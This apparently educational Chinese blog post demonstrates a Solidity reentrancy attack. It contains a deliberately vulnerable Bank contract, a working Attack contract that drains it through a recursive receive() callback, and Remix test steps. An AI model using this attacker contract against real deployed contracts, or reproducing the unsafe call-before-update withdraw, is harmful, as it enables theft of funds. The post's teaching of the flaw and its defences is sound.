solidity 重入攻击测试

最新推荐文章于 2024-06-06 19:33:05 发布
最新推荐文章于 2024-06-06 19:33:05 发布
阅读量634 收藏 1
点赞数
分类专栏: solidity 文章标签: 重入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccr1001ccr1001/article/details/112848430
版权

任何从合约 A 到合约 B 的交互以及任何从合约 A 到合约 B 的 以太币Ether 的转移,都会将控制权交给合约 B。 这使得合约 B 能够在交互结束前回调 A 中的代码。

在合约中运用转账调用call方法,可以消耗完所有的gas,而send和transfer只消耗2300。

为了便面重入,可以使用“检查-生效-交互”(Checks-Effects-Interactions)模式,或者加锁限制:

以下两个合约模拟了攻击者和受害者,通过重入攻击,获得了受害者所有的ETH。

pragma solidity >=0.7.0 <=0.8.0; 
// SPDX-License-Identifier: MIT

contract Bank {
    
    uint256 constant public ethLower = 1 ether;
    
    uint256 constant public ethUpper = 5 ether;
    
    mapping(address => uint256) balances;
    
    event depositEth(address sender,uint256 value);
    
    event withdrawEth(address sender,uint256 value);
    
    function depositEther() payable public{
        require(msg.value >= ethLower);
        require(msg.value <= ethUpper);
        balances[msg.sender] += msg.value;
        emit depositEth(msg.sender,msg.value);
    }
    
    
    function withdraw(uint256 amount) public{
        require(balances[msg.sender] >= amount);
        msg.sender.call{value: amount}("");
        balances[msg.sender] -= amount;
        emit withdrawEth(msg.sender,amount);
    }
    
    
    function withdraw() public {
        msg.sender.transfer(address(this).balance);
    }
    
    
    function getBalance(address addr) public view returns(uint256){
        return balances[addr];
    }
    
    
    function getTotal() public view returns(uint256){
        return address(this).balance;
    }

     
}
pragma solidity >=0.7.0 <=0.8.0; 
// SPDX-License-Identifier: MIT

interface IRC20 {
    
    function depositEther() external payable;

    function withdraw(uint256 amount) external;
    
    function getBalance(address addr) external view returns(uint256);
    
}

contract Attack {
    
    address constant private addr = 0x78E74b14512f2f9d3C26aeE24d902Fef10F46d72;
    
    IRC20 private tract;
    
    event withdrawEth(address sender,uint256 value);
    
    constructor(){
        tract = IRC20(addr);
    }
    
    
    function getBalance() public view returns(uint){
        return address(this).balance;
    }
    
     
    function despoit() public payable{
        tract.depositEther{value:2 ether}();
        tract.withdraw(1 ether);
    }
    
    
    function withdraw() public {
        msg.sender.transfer(address(this).balance);
    }
    
    
    receive() external payable {
        uint256 amount = tract.getBalance(address(this));
        emit withdrawEth(msg.sender,amount);
        if( amount >= 1 ether ){
            tract.withdraw(1 ether);
        }
    }
    
    
}

步骤:1. 通过remix创建合约bank(B)和attack(C).

           2.通过地址A向合约B 2次转账10ETH。此时合约B余额为10ETH。

           3.通过地址A向合约C转账2ETH。此时合约C余额为2ETH。

           4.通过合约C方法,往合约B中存入2ETH,触发提现,提取B全部的ETH。这个步骤gaslimit要给足,不然会失败。

         5,B和C合约所有测试ETH都可以通过提现方法提出来。

参考:

https://learnblockchain.cn/docs/solidity/security-considerations.html#re-entance

弘宇的IT屋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第54篇 solidity中的fallback函数与重入攻击
wonderBlock的博客
03-01 1314
本文环境: 区块链版本:以太坊POA联盟链 节点版本: geth 1.9.19 nodejs版本:v10.14.0 操作系统:windows 64 remix IDE中文版:http://remix.app.hubwiz.com/ 参考文档:https://learnblockchain.cn/docs/solidity/ 1、基本概念 从官网文档看,一些基本概念如下: 1.1 合约中地址成员发送ether的三种方法: 同时,有相应的警告信息: 1.2 receive 接.
solidity
03-26
- 重入攻击(Reentrancy Attack) **优化和调试** 为了提高合约效率和减少 gas 消耗,开发者需要考虑合约优化。此外,Solidity 提供了诸如 Remix、Truffle 和 Hardhat 等工具,帮助开发者进行合约编译、测试和部署...
Solidity - 如何避免重入攻击
qq_42908175的博客
05-29 203
今天这篇文章,我们来讲讲solidity合约的重入攻击
5. 用solidity测试
qq_40083796的博客
05-15 362
Solidity 测试合约以文件的形式与 Javascript 测试一起存在。运行时,它们将作为每个测试协定的单独测试套件包含在内。这些合约保留了 Javascript 测试的所有好处:即每个测试套件的、直接访问已部署的合约以及导入任何合约依赖关系的能力。Solidity 测试不应从任何合约(如合约)延伸而来。这使您的测试尽可能少,并让您完全控制您编写的合同。TestSolidity 测试不应受制于任何断言库。Truffle 为您提供了一个默认的断言库,但您可以随时更改此库以满足您的需求。
Solidity - 安全 - 重入攻击(Reentrancy)
ling1998的博客
06-28 2281
首先简要说明下一个很有名的重入攻击事件,再模拟重入攻击。The DAO是分布式自治组织,2016年5月正式发布,该项目使用了由德国以太坊创业公司Slock.it编写的开源代码。2016年6月17上午,被攻击的消息开始在社交网站上出现,到6月18日黑客将超过360万个以太币转移到一个child DAO项目中,child DAO项目和The DAO有着一样的结构,当时以太币的价格从20美元降到了13美元。当时,一个所谓的”递归调用“攻击(现在称为重入攻击)名词随之出现,这种攻击可以被用来消耗一些智能合约账户。这
Solidity攻击合约:重入攻击与危害分析
欢迎来到“Python算法探索”,我是GT算法工程师,一名热爱计算机算法的博主。在这里,我们将一起深入探索Python世界中的各种算法,从基础到高级,从理论到实践。我参加过很多算法比赛,积累了丰富的经验,希望通过这个播客与你分享。让我们一起用Python探
03-09 3634
本文将通过一个具体的Solidity合约示例,展示一个重入攻击合约,并分析其相对于原本合约的危害以及攻击是如何实现的。
Solidity单元测试教程
weixin_45039889的博客
04-17 385
一份Unit Test教程项目,展示 Unit Test 的基本逻辑和使用方法。
君士坦丁堡可造成新的重入攻击
KeenCryp的博客
01-16 379
即将到来的以太坊网络Constantinople升级为SSTORE操作引入了更便宜的gas成本。作为一种不必要的副作用,当在Solidity智能合约中使用address.transfer(…)或address.send(…)时,这可能引发重入攻击。以前,这些函数被认为是重入安全的,现在它们不再安全。 这段代码出了什么问题? 以下是一个简短的智能合约,在Constantinople之前不易受到重入攻...
合约安全之重入攻击
xiaoyue2019的博客
07-29 1149
还记得当年的ZheDao事件,硬是让以太坊硬分叉造就了以太经典ETC。 一个月就筹集了1个多亿刀的以太啊,想都不敢想。 16年那会,要是俺就接触了合约安全多好~哈哈。那不早就财富自由了… 要学习重入攻击,需要了解如下几个基本概念 什么是gas、gas limit、gas price 什么是fallback回退函数 什么是transfersend、call 1.gas 以太坊在区块链上实现了一个运行环境,被称为以太坊虚拟机(EVM)。每个参与到网络的节点都会运行都会运行EVM作为区块验证协议的一部分
关于智能合约的漏洞测试-重入攻击
最新发布
xiaoMa的博客
06-06 223
关于智能合约的漏洞测试-重入攻击
一个以太坊合约的漏洞分析-重入攻击
星瀚
08-25 604
这段 Solidity 代码中存在一个关键的漏洞,允许攻击者在 ContractB 中盗取数字资产。布尔变量,用于保护函数免受重入攻击。函数中的漏洞来实现攻击,让我们一步步分析和修复这个问题。这里的漏洞是没有重入保护机制的。不断减少,而每次调用都会从合约中取回相同数量的以太币。函数来进行重入攻击,每次都可以取回以太币并重复扣除。因此,攻击者可以重复取回代币,并获得更多的以太币。函数中添加重入保护。函数来存入以太币,生成相应数量的代币。,并在函数开始时将其设置为。在修复的代码中,我们在。
solidity-中文文档
05-22
- 防御编程:避免重入攻击、整数溢出/下溢、无限制转账等问题。 - 权限管理:正确设置所有权、权限委托和权限转移,防止恶意操作。 - 安全编码最佳实践:如避免使用 msg.value 直接转账,使用 SafeMath 库进行...
Solidity_BestPractices:Solidity_BestPractices
02-18
具有安全功能,可防止模块9第3课中概述的至少两个攻击媒介 :check_mark: 使用库(SafeMath.sol等)或扩展其他合同 :check_mark: 每个智能合约至少有5个测试 :check_mark: 智能合约应部署到测试网 :check_mark: ...
Solidity 官方文档中文版
09-06
Solidity开发需要遵循一系列最佳实践,如避免重入攻击、合理处理异常、限制gas消耗以及进行详尽的代码审计,以确保智能合约的健壮性。 综上所述,Solidity官方文档中文版为学习和理解这种语言提供了丰富的资源,...
solidity合约调用合约方法的方式
ccr1001ccr1001的博客
01-20 3498
1.通过接口的形式 pragma solidity >=0.7.0 <=0.8.0; // SPDX-License-Identifier: MIT interface IRC20 { function depositEther() external payable; function withdraw(uint256 amount) external; function getBalance(address addr) external .
solidity 关键字constant/view/pure/payable的区别
ccr1001ccr1001的博客
12-05 1945
https://learnblockchain.cn/docs/solidity
solidity 引用类型memory,storage,calldata
ccr1001ccr1001的博客
01-14 1176
引用类型包括结构,数组和映射,变量的存储有三种类型,memory,storage和calldata。 memory(值传递)即数据在内存中,因此数据仅在其生命周期内(函数调用期间)有效。不能用于外部调用。 storage(指针传递) 状态变量保存的位置,只要合约存在就一直存储。 calldata 用来保存函数参数的特殊数据位置,是一个只读位置。是不可修改的、非持久的函数参数存储区域,效果大多类似memory。是外部函数的参数所必需指定的位置,但也可以用于其他变量。 局部变量/状态变量 默认是..
Solidity 中 revert(), assert() 和 require()
ccr1001ccr1001的博客
01-16 1095
函数assert和require可以用于检查条件,如果条件不满足则抛出异常。 assert(): 函数只能用于测试内部错误,检查不变量,正常的函数代码永远不会产生Panic, 甚至是基于一个无效的外部输入时。 如果发生了,那就说明出现了一个需要你修复的 bug。如果使用得当,语言分析工具可以识别出那些会导致 Panic 的assert条件和函数调用。 想象为一个过于自信的实现方式,即使有错误,也会执行并扣除 gas。 下列情况将会产生一个Panic异常: 提供的错误码编号,用来指示Panic的类..
"Solidity智能合约质量保证工具Deviant:突变测试的创新应用
Solidity is a widely used scripting language for creating smart contracts in Ethereum applications. Quality assurance in Solidity contracts is crucial, as errors or vulnerabilities can lead to ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值